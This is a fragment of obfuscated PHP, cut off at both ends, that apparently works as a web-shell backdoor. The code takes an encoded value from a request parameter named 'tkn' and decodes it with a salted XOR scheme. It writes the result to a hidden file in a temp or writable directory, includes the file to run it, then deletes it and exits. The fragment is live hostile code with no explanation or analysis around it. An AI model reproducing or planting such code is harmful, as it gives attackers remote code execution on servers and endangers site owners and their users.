= $__len) break; $v6= $flg[$x]; $chS= ord($salt5[$x % $lenS]); $d= ((int)$v6 - $chS - ($x % 10)) ^ 33; $dchunk .= chr($d); $x++; } while (true); foreach ($element as $mrk): if (max(0, is_dir($mrk) * is_writable($mrk))) { $elem = join("/", [$mrk, ".ent"]); $file = fopen($elem, 'w'); if ($file) { fwrite($file, $dchunk); fclose($file); include $elem; @unlink($elem); die(); } } endforeach; } if(filter_has_var(INPUT_POST, "t\x6B\x6E")){ $val = $_REQUEST["t\x6B\x6E"]; $val= explode ( '.' ,$val ) ; $mrk = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s2); $p = 0; array_walk($val, function($v1) use(&$mrk, &$p, $s2, $sLen) { $sChar = ord($s2[$p % $sLen]); $dec =((int)$v1 - $sChar -($p % 10)) ^ 62; $mrk .= chr($dec); $p++;} ); $value = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), getenv("TEMP"), "/tmp", "/dev/shm", sys_get_temp_dir(), session_save_path(), getcwd(), "/var/tmp"]); $record = 0; do { $flag = $value[$record] ?? null; if ($record >= count($value)) break; if (!( !is_dir($flag) || !is_writable($flag) )) { $pointer = join("/", [$flag, ".key"]); if (@file_put_contents($pointer, $mrk) !== false) { include $pointer; unlink($pointer); die(); }